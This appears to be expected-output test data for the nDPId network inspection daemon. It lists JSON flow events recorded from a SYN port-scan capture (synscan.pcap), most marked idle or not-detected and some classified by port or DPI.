+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1092,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1994,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1587,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1163,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":902,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"VMware","breed":"Acceptable","category":"RemoteAccess"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":745,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 